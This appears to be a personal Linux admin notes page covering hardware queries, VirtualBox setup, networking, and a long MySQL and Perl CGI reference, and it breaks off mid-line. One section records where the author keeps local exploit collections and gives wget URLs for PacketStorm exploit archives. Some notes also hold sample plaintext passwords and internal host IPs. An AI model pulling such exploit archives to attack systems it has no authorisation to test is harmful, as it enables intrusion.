---[Get display info]--- (top)
ben@ben-b:~$ inxi -G Graphics: Device-1: Intel 2nd Generation Core Processor Family Integrated Graphics driver: i915 v: kernel Display: x11 server: X.Org 1.20.5 driver: modesetting unloaded: fbdev,vesa resolution: 1366x768~60Hz OpenGL: renderer: Mesa DRI Intel Sandybridge Mobile v: 3.3 Mesa 19.2.8 ben@ben-b:~$ sudo lshw -numeric -C display *-display description: VGA compatible controller product: 2nd Generation Core Processor Family Integrated Graphics Controller [8086:126] vendor: Intel Corporation [8086] physical id: 2 bus info: pci@0000:00:02.0 version: 09 width: 64 bits clock: 33MHz capabilities: msi pm vga_controller bus_master cap_list rom configuration: driver=i915 latency=0 resources: irq:33 memory:e1400000-e17fffff memory:d0000000-dfffffff ioport:4000(size=64) memory:c0000-dffff
---[GPU Info]--- (top)
To check which GPU is currently in command (that means which is an active VGA controller) type in
ben@ben-b:~$ lspci -vnnn | perl -lne 'print if /^\d+\:.+(\[\S+\:\S+\])/' | grep VGA 00:02.0 VGA compatible controller [0300]: Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller [8086:0126] (rev 09) (prog-if 00 [VGA controller]) Some expert also holds a view that GPU temps around 90 degree Celsius are normal GPU temp. But it is better if you can keep it under 90 degrees. From 65 to 80 degrees Celsius. CPU temperature, close to critical. During General Usage, your CPU Temperature can have any value between 30-65 °C. But with Extended Gaming and Heavy Usage, the temperature can easily reach a range of 65-90 °C. But for most Processors, the maximum temperature limit is somewhere around 90-95 °C. Ryzen 7 4800H, 4800U, 4700U 105°C Ryzen 7 105°C AMD Radeon RX Graphics processor anything under 82°C is considered a safe temperature. the card should run 70c - 80C in a well ventilated case. radeontool radeontop sensors lm-sensors hddtemp psensor acpitz-acpi-0 Adapter: ACPI interface temp1: +55.0°C (crit = +114.0°C) iwlwifi_1-virtual-0 Adapter: Virtual device temp1: +51.0°C amdgpu-pci-0300 Adapter: PCI adapter vddgfx: 725.00 mV fan1: 0 RPM (min = 0 RPM, max = 4950 RPM) edge: +55.0°C (crit = +100.0°C, hyst = -273.1°C) (emerg = +105.0°C) junction: +56.0°C (crit = +100.0°C, hyst = -273.1°C) (emerg = +105.0°C) mem: +0.0°C (crit = +105.0°C, hyst = -273.1°C) (emerg = +110.0°C) power1: 22.00 W (cap = 40.00 W)
---[Get you Mother Board Model]--- (top)
To find your motherboard model, use dmidecode or inxi command.
ben@ben-b:~$ sudo dmidecode -t baseboard | grep -i 'Product' Product Name: 0NVF5K
ben@ben-b:~$ inxi -M Machine: Type: Laptop System: Dell product: Latitude E6520 v: 01 serial: Mobo: Dell model: 0NVF5K v: A01 serial: BIOS: Dell v: A21 date: 03/06/2018
Ref. https://www.binarytides.com/linux-get-gpu-information/
---[Exploit Collections]--- (top)
These are where I store my local copies of exploit code.
At this time, each collection is kept seperate. I would like to figure a way to index them all into something like searchsploit.
Metasploit Framework
/opt/metasploit-framework/
client authentication configuration file /home/ben/.msf4/db/pg_hba.conf
database at /home/ben/.msf4/db
/home/ben/.msf4/logs/
Local website https://127.0.0.1:5443/
/opt/metasploit-framework
To update:
Use the apt-get commands as root to update your instance of metasploit as needed.
SearchSploit
/opt/exploitdb/searchsploit
The exploits /opt/exploitdb
The papers /opt/exploitdb-papers
searchsploit -u
PacketStorm
I keep these in ~/Hacking/packetstorm.archives/
Before 2021: wget https://dl.packetstormsecurity.net/0012-exploits/2018-exploits.tgz As of 05.29.2021 14:14:33 https://packetstormsecurity.com/files/download/160738/2020-exploits.tgz
Use wget to download the tgz file into ~/Hacking/packetstorm.archives/
---[Installing Virturalbox]--- (top)
Start installing...
wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- > oracle_vbox_2016.asc wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- > oracle_vbox.asc sudo apt-key add oracle_vbox_2016.asc sudo apt-key add oracle_vbox.asc echo "deb [arch=amd64] http://download.virtualbox.org/virtualbox/debian bionic contrib" | sudo tee /etc/apt/sources.list.d/virtualbox.list sudo apt install linux-headers-$(uname -r) dkms cd ~/ wget https://download.virtualbox.org/virtualbox/6.1.6/ Oracle_VM_VirtualBox_Extension_Pack-6.1.6.vbox-extpack ben@ben-b:~/Downloads$ sudo apt-get install virtualbox-6.1 Reading package lists... Done Building dependency tree Reading state information... Done E: Unable to locate package virtualbox-6.1 E: Couldn't find any package by glob 'virtualbox-6.1' E: Couldn't find any package by regex 'virtualbox-6.1' ben@ben-b:~$ sudo apt search virtualbox p boinc-virtualbox - metapackage for virtualbox-savvy projects p boinc-virtualbox:i386 - metapackage for virtualbox-savvy projects p unity-scope-virtualbox - VirtualBox scope for Unity p virtualbox - x86 virtualization solution - base binaries p virtualbox:i386 - x86 virtualization solution - base binaries p virtualbox-dkms - x86 virtualization solution - kernel module sources for p virtualbox-ext-pack - extra capabilities for VirtualBox, downloader. p virtualbox-guest-additions-iso - guest additions iso image for VirtualBox p virtualbox-guest-dkms - x86 virtualization solution - guest addition module sour v virtualbox-guest-dkms:i386 - p virtualbox-guest-dkms-hwe - x86 virtualization solution - guest addition module sour v virtualbox-guest-modules - v virtualbox-guest-modules:i386 - p virtualbox-guest-source - x86 virtualization solution - guest addition module sour p virtualbox-guest-source-hwe - x86 virtualization solution - guest addition module sour p virtualbox-guest-utils - x86 virtualization solution - non-X11 guest utilities p virtualbox-guest-utils:i386 - x86 virtualization solution - non-X11 guest utilities p virtualbox-guest-utils-hwe - x86 virtualization solution - non-X11 guest utilities p virtualbox-guest-utils-hwe:i386 - x86 virtualization solution - non-X11 guest utilities p virtualbox-guest-x11 - x86 virtualization solution - X11 guest utilities p virtualbox-guest-x11:i386 - x86 virtualization solution - X11 guest utilities p virtualbox-guest-x11-hwe - x86 virtualization solution - X11 guest utilities p virtualbox-guest-x11-hwe:i386 - x86 virtualization solution - X11 guest utilities v virtualbox-modules - p virtualbox-qt - x86 virtualization solution - Qt based user interface p virtualbox-qt:i386 - x86 virtualization solution - Qt based user interface p virtualbox-source - x86 virtualization solution - kernel module source
So I am stuck at this point regarding version 6.1 - 5.2.34 is the version in the software manager.
Ref. https://computingforgeeks.com/install-virtualbox-on-kali-linux-linux-mint/
See this ref. for info on installing Kali's OVA appliance into Virtualbox. https://itsfoss.com/install-kali-linux-virtualbox/
MIN HOUR DOM MON DOW CMD Field Description Allowed Value MIN Minute field 0 to 59 HOUR Hour field 0 to 23 DOM Day of Month 1-31 MON Month field 1-12 DOW Day Of Week 0-6 CMD Command Any command to be executed. To edit the jobs crontab -e List jobs crontab -l Run script at 2:00 AM every day 0 2 * * * /bin/sh backup.sh
---[Linux Kernels]--- (top)
List all of the Linux kernels installed in /boot (its own partition)
$ aptitude search ~ilinux-image
Then remove a specific version
$ sudo apt-get autoremove linux-image-5.5.0-kali2-amd64
Make sure to keep the 'generic' version. Also keep the current and next oldest as a backup.
https://wiki.debian.org/Aptitude
---[Date Time Code]--- (top)
This is an ANSI code I use for current Date/Time stamps (Geany)
%a %m.%d.%Y %H:%M:%S
---[Geany Editor]--- (top)
The dictionary words that I add as part of spell checking are stored in ~/.config/enchant/en_US.dic
The main config file is ~.config/geany/geany.conf
Inserting Unicode characters
You can insert Unicode code points by hitting Ctrl-Shift-u, then still holding Ctrl-Shift, type some hex digits representing the code point for the character you want and hit Enter or Return (still holding Ctrl-Shift). If you release Ctrl-Shift before hitting Enter or Return (or any other character), the code insertion is completed, but the typed character is also entered. In the case of Enter/Return, it is a newline, as you might expect.
Geany provides a handy bookmarking feature that lets you mark one or more lines in a document, and return the cursor to them using a key combination.
To place a mark on a line, either left-mouse-click in the left margin of the editor window, or else use Ctrl-m. This will produce a small green plus symbol in the margin. You can have as many marks in a document as you like. Click again (or use Ctrl-m again) to remove the bookmark. To remove all the marks in a given document, use "Remove Markers" in the Document menu.
To navigate down your document, jumping from one mark to the next, use Ctrl-. (control period). To go in the opposite direction on the page, use Ctrl-, (control comma). Using the bookmarking feature together with the commands to switch from one editor tab to another (Ctrl-PgUp/PgDn and Ctrl-Tab) provides a particularly fast way to navigate around multiple files.
There is basic support for column mode editing. To use it, create a rectangular selection by holding down the Control and Shift keys (or Alt and Shift on Windows) while selecting some text. Once a rectangular selection exists you can start editing the text within this selection and the modifications will be done for every line in the selection. It is also possible to create a zero-column selection - this is useful to insert text on multiple lines.
https://www.geany.org/manual/current/index.html
---[mtr]--- (top)
You can force mtr to display numeric IP addresses instead of host names (typically FQDNs – Fully Qualified Domain Names), using the -n flag as shown.
$ sudo mtr google.com $ sudo mtr -n google.com $ sudo mtr -b google.com
You can set it into report mode using the -r flag, a useful option for producing statistics concerning network quality. You can use this option together with the -c option to specify the number of pings. Since the statistics are printed to std output, you can redirect them to a file for later analysis.
$ sudo mtr -r -c 5 google.com >mtr-report
The -w flag enables wide report mode for a clearer output.
$ sudo mtr -rw -c 5 google.com >mtr-report
Ref: https://www.tecmint.com/mtr-a-network-diagnostic-tool-for-linux/
---[Burn DVD]--- (top)
Rather than using dd to write to a DVD, use growisofs:
$ growisofs -dvd-compat -Z /dev/dvd=my_test.iso $ growisofs -dvd-compat -Z /dev/dvd=ubuntu-18.04.4-desktop-amd64.iso
The kernel etc are in /boot
I found this at https://askubuntu.com/questions/2793/how-do-i-remove-old-kernel-versions-to-clean-up-the-boot-menu
dpkg --list | grep linux-image | awk '{ print $2 }' | sort -V | sed -n '/'`uname -r`'/q;p' | xargs sudo apt-get -y purge
---[Set Static IP]--- (top)
Setting a static IP address
$ ifconfig eth0 10.32.10.233 netmask 255.255.255.0 $ route add default gw 10.32.10.1
Also
1. Set Your IP Address ifconfig eth0 192.168.1.5 netmask 255.255.255.0 up 2. Set Your Default Gateway route add default gw 192.168.1.1 3. Set Your DNS Server Yes, 1.1.1.1 is a real DNS resolver by CloudFlare. echo "nameserver 1.1.1.1" > /etc/resolv.conf
In addition...
Show your IP using ip
ip addr show
Bring an interface up or down using ip
ip link set eth1 up
ip link set eth1 down
Showing your routing using ip
ip route show
sudo ifconfig eth0 192.168.0.1 netmask 255.255.255.0 sudo route add default gw 192.168.0.253 eth0 route -n
---[Setting up Perl and Apache2]--- (top)
For every file in cgi-bin, you need to give the www-data group permissions.
ben@benb:/usr/lib/cgi-bin$ sudo chgrp -R www-data ./cgi-bin ben@benb:/usr/lib/cgi-bin$ chmod -R g+rwx ./cgi-bin
# perl -MCPAN -e shell cpan> install DBI cpan> install DBD::mysql
List all installed CPAN Perl modules
$ instmodsh
To install a perl module
$ cpan cpan[1]> install DBD/ODBC
Mpstat is part of the sysstat package in Linux. The mpstat command writes to standard output about activities for each available processor, processor 0 being the first one. If no activity has been selected, then the default report is the CPU utilization report.
The first line is a set of column labels. The second line is the value for each column:
%usr - % CPU usage at the user level %nice - % CPU usage for user processes labeled “nice” %sys - % CPU usage at the system (Linux kernel) level %iowait - % CPU usage idling waiting on a disk read/write %irq - % CPU usage handling hardware interrupts %soft - % CPU usage handing software interrupts %steal - % CPU usage being forced to wait for a hypervisor handling other virtual processors %guest - % CPU usage spent running a virtual processor %idle - % CPU usage on idle time (no processes, and not waiting on a disk read/write)
mpstat without any option will display Global Average Activities of all CPUs
iostat Command for Average Usage
$ iostat
The system will display average CPU usage since the last boot. It will also display input/output load (disk read/write activity).
The sar is a performance monitoring tool for collecting, viewing and recording performance data and can list what a system is doing all the time. Sar command can generate report and email them to system admin. The statistics reported by sar include I/O transfer rates, paging activity, process-related activities, interrupts, network activity, memory and swap space utilization, CPU utilization, kernel activities and TTY statistics, among others. Run sar without any option and check the output. The default output list statistics for every 10 minutes and a final average.
Vmstat
The vmstat command will display statistics about system processes, memory, swap, I/O, and the CPU performance. For displaying statistics, the data is collected from the last time the command was run to the present. In case the command never being run, the data will be from the last reboot to the current time.
On multiple CPU systems, vmstat averages the number of CPUs into the output. The vmstat command updates its output like top command.
Checking and repairing ext4 fs.
$ sudo fdisk -l ben@benb:~$ sudo fdisk -l Disk /dev/mmcblk0: 119.5 GiB, 128286982144 bytes, 250560512 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disklabel type: dos Disk identifier: 0xb5f93e02 Device Boot Start End Sectors Size Id Type /dev/mmcblk0p1 2048 250560511 250558464 119.5G 83 Linux Disk /dev/sda: 931.5 GiB, 1000204886016 bytes, 1953525168 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 4096 bytes I/O size (minimum/optimal): 4096 bytes / 4096 bytes Disklabel type: dos Disk identifier: 0x0f64c45e Device Boot Start End Sectors Size Id Type /dev/sda1 * 2048 1499135 1497088 731M 83 Linux /dev/sda2 1501182 1953523711 1952022530 930.8G 5 Extended /dev/sda5 1501184 1953523711 1952022528 930.8G 83 Linux Partition 2 does not start on physical sector boundary. Disk /dev/mapper/sda5_crypt: 930.8 GiB, 999433437184 bytes, 1952018432 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 4096 bytes I/O size (minimum/optimal): 4096 bytes / 4096 bytes Disk /dev/mapper/mint--vg-root: 929.8 GiB, 998374375424 bytes, 1949949952 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 4096 bytes I/O size (minimum/optimal): 4096 bytes / 4096 bytes Disk /dev/mapper/mint--vg-swap_1: 976 MiB, 1023410176 bytes, 1998848 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 4096 bytes I/O size (minimum/optimal): 4096 bytes / 4096 bytes ben@benb:~$ ---EOE--- $ sudo badblocks -v /dev/sda5 > badsectors.sda5.txt The -l option tells the command to add the block numbers listed in the file specified by filename (badsectors.txt) to the list of bad blocks. $ sudo e2fsck -l badsectors.txt /dev/sda5 $ sudo smartctl -H /dev/sda5 For an overview of disk information, use the -a or --all option to print out all SMART information concerning a disk and -x or --xall which displays all SMART and non-SMART information about a disk. To run self-tests, use: smartctl -t
systemctl {start|stop|restart|status} mysqld /* Login. You will first be prompted for the Linux root password, and then for the mysql root account password */ $ sudo mysql -u root -p mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | sys | +--------------------+ 4 rows in set (0.00 sec) mysql> USE mysql; Database changed /* Exit the MySQL interrupter */ mysql> QUIT; /* Login and provide an SQL script to be run and capture output (from Bash command line) */ $ mysql -u username -p db_name < mysqlscript.txt > output.txt /* Create a database on the sql server */ mysql> create database [databasename]; /* List all databases on the sql server */ mysql> show databases; /* Switch to a database */ mysql> use [db name]; /* To see all the tables in the db */ mysql> show tables; /* To see database's field formats */ mysql> describe [table name]; /* To delete a db */ mysql> drop database [database name]; /* To delete a table */ mysql> drop table [table name]; /* Show all data in a table */ mysql> SELECT * FROM [table name]; /* Returns the columns and column information pertaining to the designated table */ mysql> show columns from [table name]; /* Show certain selected rows with the value "whatever" */ mysql> SELECT * FROM [table name] WHERE [field name] = "whatever"; /* Show unique records */ mysql> SELECT DISTINCT [column name] FROM [table name]; /* Show selected records sorted in an ascending (asc) or descending (desc) */ mysql> SELECT [col1],[col2] FROM [table name] ORDER BY [col2] DESC; /* Duplicate a table */ CREATE TABLE inventorybackup LIKE inventory; INSERT INTO inventorybackup SELECT * FROM inventory; /* Count rows */ mysql> SELECT COUNT(*) FROM [table name]; /* Switch to the mysql db. Create a new user */ mysql> INSERT INTO [table name] (Host,User,Password) VALUES('%','user',PASSWORD('password')); /* To update info already in a table */ mysql> UPDATE [table name] SET Select_priv = 'Y',Insert_priv = 'Y', Update_priv = 'Y' where [field name] = 'user'; /* Delete a row(s) from a table */ mysql> DELETE from [table name] where [field name] = 'whatever'; /* Delete a column */ mysql> alter table [table name] drop column [column name]; /* Add a new column to db */ mysql> alter table [table name] add column [new column name] varchar (20); /* Change column name */ mysql> alter table [table name] change [old column name] [new column name] varchar (50); /* Make a unique column so you get no dupes */ mysql> alter table [table name] add unique ([column name]); /* Make a column bigger */ mysql> alter table [table name] modify [column name] VARCHAR(3); /* Load a CSV file into a table */ mysql> LOAD DATA INFILE '/tmp/filename.csv' replace INTO TABLE [table name] FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n' (field1,field2,field3); /* Dump all databases for backup. Backup file is sql commands to recreate all db's */ mysql> [mysql dir] /> <META HTTP-EQUIV="Pragma" CONTENT="no-cache" />/bin/mysqldump -u root -ppassword --opt >/tmp/alldatabases.sql /* Dump just the inventory database */ sudo mysqldump -u root -p --databases inventory >~/bkup/mysql/inventoryDB.sql /* Dump one database for backup */ mysql> [mysql dir]/bin/mysqldump -u username -ppassword --databases databasename >/tmp/databasename.sql /* Change a user password */ SET PASSWORD FOR 'dbadmin'@'localhost' = bigshark; or ALTER USER dbadmin@localhost IDENTIFIED BY 'littlewhale'; /* Export the entier Inventory table to CSV format */ /* Note that you can export only into the '/var/lib/mysql-files/' directory */ select id, ifnull(ip,'None'),ifnull(mac,'Unknown'),ifnull(name,'Unknown'), ifnull(location,'unknown'),ifnull(ports,'unknown'),ifnull(type,'Unknown'), ifnull(sn,''),ifnull(os,''),ifnull(firmware,''),ifnull(dante,''), ifnull(ssid,''),ifnull(channel,''),ifnull(frequency,''),ifnull(band,''), ifnull(channelwidth,''),ifnull(strength,''),ifnull(encryption,''), ifnull(notes,''),ifnull(ethernet,'') from inventory into outfile '/var/lib/mysql-files/inventory.csv.export.date.time.csv' fields enclosed by '"' terminated by ';' escaped by '"' lines terminated by '\r\n'; /* This a an actual production example */ /* ben@benb:~/bkup/mysql$ sudo mysqldump -u root -p --databases inventory > inventoryDB.10.05.2020-13:21:49.sql */ /* Dump a table from a database */ mysql> [mysql dir]/bin/mysqldump -c -u username -ppassword databasename tablename > /tmp/databasename.tablename.sql /* Restore database (or database table) from backup */ mysql> [mysql dir]/bin/mysql -u username -ppassword databasename < /tmp/databasename.sql /* Copy values from one column into another. */ mysql> update inventory set band=channel; Create Table Example 1. CREATE TABLE [table name] (firstname VARCHAR(20), middleinitial VARCHAR(3), lastname VARCHAR(35), suffix VARCHAR(3), officeid VARCHAR(10), userid VARCHAR(15), username VARCHAR(8), email VARCHAR(35), phone VARCHAR(25), groups VARCHAR(15), datestamp DATE, timestamp time, pgpemail VARCHAR(255)); Create Table Example 2. create table [table name] (personid int(50) not null auto_increment primary key, firstname varchar(35), middlename varchar(50), lastname varchar(50) default 'bato'); References: http://g2pc1.bu.edu/~qzpeng/manual/MySQL%20Commands.htm https://www.computerhope.com/unix/mysql.htm
mysql> create database inventory; mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | inventory | | mysql | | performance_schema | | sys | +--------------------+ 5 rows in set (0.00 sec) mysql> use inventory; Database changed mysql> create table inventory ( id int not null auto_increment primary key, ip varchar(15), mac varchar(18), name varchar(96), location varchar(124), type varchar(96), sn varchar(124), os varchar(124), firmware varchar(96), ssid varchar(96), channel varchar(4), frequency varchar(10), band varchar(8), encryption varchar(24), notes varchar(1024) ); mysql> describe inventory; +------------+---------------+------+-----+---------+----------------+ | Field | Type | Null | Key | Default | Extra | +------------+---------------+------+-----+---------+----------------+ | id | int(11) | NO | PRI | NULL | auto_increment | | ip | varchar(15) | YES | | NULL | | | mac | varchar(18) | YES | | NULL | | | name | varchar(96) | YES | | NULL | | | location | varchar(124) | YES | | NULL | | | type | varchar(96) | YES | | NULL | | | sn | varchar(124) | YES | | NULL | | | os | varchar(124) | YES | | NULL | | | firmware | varchar(96) | YES | | NULL | | | ssid | varchar(96) | YES | | NULL | | | channel | varchar(4) | YES | | NULL | | | frequency | varchar(10) | YES | | NULL | | | band | varchar(8) | YES | | NULL | | | encryption | varchar(24) | YES | | NULL | | | notes | varchar(1024) | YES | | NULL | | +------------+---------------+------+-----+---------+----------------+ 15 rows in set (0.01 sec) /* Load a CSV file into a table. Save the sheet as csv, remove the title line, and save */ mysql> LOAD DATA LOCAL INFILE '~/CCCC/Tech/database/CCCC.Network.Inventory.csv' replace INTO TABLE inventory FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n' (ip, mac, name, location, type, sn, os, firmware, ssid, channel, frequency, band, encryption, notes); /* If both of the following commands give the same total, there are no duplicate mac addresses in the table. Note that there are duplicate IP addresses in the table, and there should be. */ mysql> select mac from inventory where mac != ''; mysql> select distinct mac from inventory; mysql> select ip,os from inventory where os like '%win%7%'; +--------------+-----------------------------------------------------+ | ip | os | +--------------+-----------------------------------------------------+ | 10.32.10.4 | Windows Server 2008 R2 Standard 7601 Service Pack 1 | | 10.32.10.137 | Win 7 Home Premium Service Pack 1 | | 10.32.10.170 | Win 7 Pro | | 10.32.10.175 | Win 7 | | 10.32.10.214 | Win 7 Pro | | 10.32.10.235 | Win 7 Pro | +--------------+-----------------------------------------------------+ 6 rows in set (0.00 sec) /* Dump the schema of a database. In the following example you can append ' > filename.sql' (no quotes) to capture the outpout to a file */ $ sudo mysqldump -d -u root -p inventory -- MySQL dump 10.13 Distrib 5.7.30, for Linux (x86_64) -- -- Host: localhost Database: inventory -- ------------------------------------------------------ -- Server version 5.7.30-0ubuntu0.18.04.1 /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; /*!40101 SET NAMES utf8 */; /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; /*!40103 SET TIME_ZONE='+00:00' */; /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; -- -- Table structure for table 'inventory' -- DROP TABLE IF EXISTS 'inventory'; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE 'inventory' ( 'id' int(11) NOT NULL AUTO_INCREMENT, 'ip' varchar(15) DEFAULT NULL, 'mac' varchar(18) DEFAULT NULL, 'name' varchar(96) DEFAULT NULL, 'location' varchar(124) DEFAULT NULL, 'type' varchar(96) DEFAULT NULL, 'sn' varchar(124) DEFAULT NULL, 'os' varchar(124) DEFAULT NULL, 'firmware' varchar(96) DEFAULT NULL, 'ssid' varchar(96) DEFAULT NULL, 'channel' varchar(4) DEFAULT NULL, 'frequency' varchar(10) DEFAULT NULL, 'band' varchar(8) DEFAULT NULL, 'encryption' varchar(24) DEFAULT NULL, 'notes' varchar(1024) DEFAULT NULL, PRIMARY KEY ('id') ) ENGINE=InnoDB AUTO_INCREMENT=270 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2020-05-13 13:28:10 /* Ref for backup and restores: https://linuxize.com/post/ how-to-back-up-and-restore-mysql-databases-with-mysqldump/ */ /* Backup a database */ $ sudo mysqldump -u root -p inventory > mysql-inventory-$(date +%F)-backup.sql /* Restore a database */ $ mysql inventory < mysql-inventory-backup.sql GROUP BY select mac,count(*) as Total from inventory group by mac order by Total desc; /* Create a MySQL user account */ mysql> CREATE USER 'parth'@'localhost' IDENTIFIED BY 'MyPassword'; /* List all MySQL user accounts */ mysql> SELECT User,Host FROM mysql.user; +------------------+-----------+ | User | Host | +------------------+-----------+ | debian-sys-maint | localhost | | mysql.session | localhost | | mysql.sys | localhost | | root | localhost | +------------------+-----------+ 4 rows in set (0.00 sec) /* Insert new record if a field value does not exist */ INSERT INTO inventory (mac) SELECT 'e8:9f:80:43:55:04' WHERE NOT EXISTS (Select mac From inventory WHERE mac ='e8:9f:80:43:55:04') LIMIT 1; /* Delete a MySQL user account */ mysql> drop user parth@localhost; /* Here is a short list of commonly used permissions : ALL - Allow complete access to a specific database. If a database is not specified, then allow complete access to the entirety of MySQL. CREATE - Allow a user to create databases and tables. DELETE - Allow a user to delete rows from a table. DROP - Allow a user to drop databases and tables. EXECUTE - Allow a user to execute stored routines. GRANT OPTION - Allow a user to grant or remove another user's privileges. INSERT - Allow a user to insert rows from a table. SELECT - Allow a user to select data from a database. SHOW DATABASES- Allow a user to view a list of all databases. UPDATE - Allow a user to update rows in a table. */ /* Grant ALL permissions to a user for a database */ mysql> GRANT ALL PRIVILEGES ON inventory.* TO 'username'@'localhost'; /* After changing permissions, save them */ mysql> FLUSH PRIVILEGES; /* Display permissions for a user */ mysql> show grants for root@localhost; +---------------------------------------------------------------------+ | Grants for root@localhost | +---------------------------------------------------------------------+ | GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION | | GRANT PROXY ON ''@'' TO 'root'@'localhost' WITH GRANT OPTION | +---------------------------------------------------------------------+ 2 rows in set (0.00 sec) /* Show privileges for all users */ mysql> SELECT User, Host, Super_priv, Create_user_priv, Grant_priv from mysql.user WHERE Create_user_priv = 'Y' AND Grant_Priv = 'Y'; +------------------+-----------+------------+------------------+------------+ | User | Host | Super_priv | Create_user_priv | Grant_priv | +------------------+-----------+------------+------------------+------------+ | root | localhost | Y | Y | Y | | debian-sys-maint | localhost | Y | Y | Y | +------------------+-----------+------------+------------------+------------+ 2 rows in set (0.00 sec) /* Select statements */ /* Ben, add lots of select examples here */
The mysqlcheck client performs table maintenance: It checks, repairs, optimizes, or analyzes tables.
mysqlcheck uses the SQL statements CHECK TABLE, REPAIR TABLE, ANALYZE TABLE, and OPTIMIZE TABLE in a convenient way for the user.
If you do not name any tables following db_name or if you use the --databases or --all-databases option, entire databases are checked.
Ref. https://dev.mysql.com/doc/refman/8.0/en/mysqlcheck.html
To delete duplicate rows based on multipul columns;
ALTER IGNORE TABLE your_table ADD UNIQUE (field1,field2,field3);
You can also try this:
ALTER IGNORE TABLE users ADD UNIQUE(email, alt_email, mobile and alt_mobile);
This will go through the table, copy it over, ignoring any dups. I am, however, hesitant to say that it will properly handle NULLs in those columns.
The following are some perl notes. These need to be moved to their own page.
Install cpanm to make installing other modules easier (you'll thank us later). You need to type these commands into a Terminal emulator (Mac OS X, Win32, Linux) sudo cpan App::cpanminus Now install any module you can find. sudo cpanm Module::Name $ sudo cpan install Net::CGI install Net::DBI or $ sudo cpan Net::DNS Cpanminus or cpanm is a cpan client to get, unpack, build and install modules from CPAN repository. It is a standalone, dependency-free script that requires zero-configuration. Many experienced Perl developers prefer cpanm over cpan.
The Contacts Database
The following was used to build the contacts database and table.
mysql> create database contacts; mysql> use inventory; mysql> CREATE TABLE contacts ( id int not null auto_increment primary key, fname varchar(32), mi varchar(12), lname varchar(32), suffix varchar(12), email varchar(64), email2 varchar(64), textnum varchar(32), phone varchar(32), phone2 varchar(32), street varchar(64), city varchar(64), state varchar(25), zip varchar(16), groups varchar(1024), comments varchar(2048), datestamp date, timestamp time );
This is a third way to loop through all of the posted vars Can I use this example to get all the POSTed vars? use CGI ':standard'; # Get me some vars my @params = param(); my $APP_NAME = param('app_name'); my $APP_WEB_PORT = param('app_web_port'); my $APP_WEB_USER = param('app_web_user'); my $APP_WEB_PASS = param('app_web_pass'); my $DOWNLOAD_DIR = param('download_dir'); my $CONFIG_DIR = param('config_dir'); my $LIBRARY_DIR = param('library_dir'); my $TEMP_DOWNLOAD_DIR = param('temp_download_dir');
print "SERVER_SOFTWARE = $ENV{'SERVER_SOFTWARE'}\n"; print "SERVER_NAME = $ENV{'SERVER_NAME'}\n"; print "GATEWAY_INTERFACE = $ENV{'GATEWAY_INTERFACE'}\n"; print "SERVER_PROTOCOL = $ENV{'SERVER_PROTOCOL'}\n"; print "SERVER_PORT = $ENV{'SERVER_PORT'}\n"; print "SERVER_ROOT = $ENV{'SERVER_ROOT'}\n"; print "REQUEST_METHOD = $ENV{'REQUEST_METHOD'}\n"; print "HTTP_AccEPT = $ENV{'HTTP_AccEPT'}\n"; print "PATH_INFO = $ENV{'PATH_INFO'}\n"; print "PATH = $ENV{'PATH'}\n"; print "PATH_TRANSLATED = $ENV{'PATH_TRANSLATED'}\n"; print "SCRIPT_NAME = $ENV{'SCRIPT_NAME'}\n"; print "QUERY_STRING = $ENV{'QUERY_STRING'}\n"; print "QUERY_STRING_UNESCAPED = $ENV{'QUERY_STRING_UNESCAPED'}\n"; print "REMOTE_HOST = $ENV{'REMOTE_HOST'}\n"; print "REMOTE_IDENT = $ENV{'REMOTE_IDENT'}\n"; print "REMOTE_ADDR = $ENV{'REMOTE_ADDR'}\n"; print "REMOTE_USER = $ENV{'REMOTE_USER'}\n"; print "AUTH_TYPE = $ENV{'AUTH_TYPE'}\n"; print "CONTENT_TYPE = $ENV{'CONTENT_TYPE'}\n"; print "CONTENT_LENGTH = $ENV{'CONTENT_LENGTH'}\n"; print "DOCUMENT_ROOT = $ENV{'DOCUMENT_ROOT'}\n"; print "DOCUMENT_URI = $ENV{'DOCUMENT_URI'}\n"; print "DOCUMENT_NAME = $ENV{'DOCUMENT_NAME'}\n"; print "DATE_LOCAL = 